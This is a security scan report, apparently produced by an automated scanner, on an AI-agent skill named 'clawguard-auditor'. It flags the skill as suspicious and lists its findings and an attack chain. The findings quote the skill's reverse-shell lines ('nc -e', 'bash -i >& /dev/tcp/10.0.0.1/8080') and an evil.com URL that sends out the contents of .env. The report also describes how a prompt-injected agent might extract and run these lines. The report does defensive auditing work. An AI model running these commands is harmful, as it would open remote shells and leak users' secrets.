中文 EN

扫描报告

扫描新文件

可疑 — 风险评分 42/100
上次扫描:2 天前 重新扫描
42 /100
clawguard-auditor
Enterprise-grade Security Kernel, SAST Vetter, and Active DLP Engine for OpenClaw
Security auditor skill contains embedded reverse shell patterns (nc -e, bash -i >& /dev/tcp) and data exfiltration examples (evil.com/?data=$(cat .env)) within documentation. No executable code files present, but the skill specification describes extensive capabilities (filesystem:WRITE, network:READ, shell:ADMIN) without implementation.
技能名称clawguard-auditor
分析耗时74.2s
引擎pi
谨慎使用
Do not install this skill. The documentation contains dangerous pattern examples that could be extracted by a compromised AI agent, and the skill describes capabilities far exceeding what documentation-only implementation requires.

攻击链 4 步

入口 Skill masquerades as legitimate security auditor
SKILL.md:1
提权 Documentation embeds reverse shell patterns as 'detection examples'
SKILL.md:55
提权 AI agent extracts and interprets embedded patterns during skill processing
SKILL.md:55
影响 Potential execution of nc -e /dev/tcp or bash reverse shell commands
SKILL.md:55

安全发现 4 项

严重性 安全发现 位置
高危
Embedded reverse shell command patterns
SKILL.md contains literal strings 'nc -e' and 'bash -i >& /dev/tcp/10.0.0.1/8080 0>&1' at line 55 within a list of 'red flags to detect'. While in context these are examples, they represent dangerous patterns that could be extracted by prompt injection or interpreted by a compromised AI agent.
reverse shell signatures (`nc -e`, `bash -i >& /dev/tcp`)
→ Remove or escape dangerous patterns in documentation. Use generic descriptions like 'network connection backdoors' instead of literal command syntax.
 SKILL.md:55
中危
Data exfiltration pattern example
SKILL.md contains 'http://evil.com/?data=$(cat .env)' as an example of what the DLP engine should block. This embeds a real exfiltration technique as instructional content.
http://evil.com/?data=$(cat .env)
→ Replace with generic description: 'URL parameter data exfiltration attempts'.
 SKILL.md:99
中危
Capabilities exceed implementation
The skill describes requiring CAP_FS_WRITE, CAP_NET_EGRESS, CAP_SYS_EXEC, and CAP_FS_READ_SENSITIVE capabilities, but no executable code files exist. This creates a mismatch between declared purpose and actual functionality.
CAP_FS_WRITE: Modify workspace files
→ If this is documentation-only, declare NONE for all resource levels.
 SKILL.md:25
低危
Documentation-only implementation
All files are Markdown or JSON with no scripts/, requirements.txt, package.json, or any executable code. The skill is a specification without implementation.
--- name: clawguard-auditor
→ Verify if actual implementation files exist or are expected.
 SKILL.md:1
资源类型声明权限推断权限状态证据
文件系统 WRITE NONE ✓ 一致 SKILL.md describes CAP_FS_WRITE capability but no code exists to exercise it
网络访问 READ NONE ✓ 一致 SKILL.md describes NET_EGRESS token but no network code present
命令执行 ADMIN NONE ✓ 一致 No shell scripts or subprocess calls in any file
环境变量 READ NONE ✓ 一致 Mentions credential access but no code implements it
2 严重 3 项发现
💀
严重 危险命令 危险 Shell 命令
nc -e
SKILL.md:55
💀
严重 危险命令 危险 Shell 命令
bash -i >&
SKILL.md:55
🔗
中危 外部 URL 外部 URL
http://evil.com/?data=$(cat
SKILL.md:99

目录结构

3 文件 · 13.8 KB · 271 行
Markdown 2f · 263L JSON 1f · 8L
├─ 📋 _meta.json JSON 8L · 286 B
├─ 📝 README.md Markdown 114L · 6.0 KB
└─ 📝 SKILL.md Markdown 149L · 7.6 KB

安全亮点

✓ No executable scripts or binary files present
✓ No actual network connections or data exfiltration attempted
✓ No credential harvesting code implemented
✓ No base64-encoded payloads or obfuscated code
✓ Patterns appear in documented 'detection examples' context rather than as instructions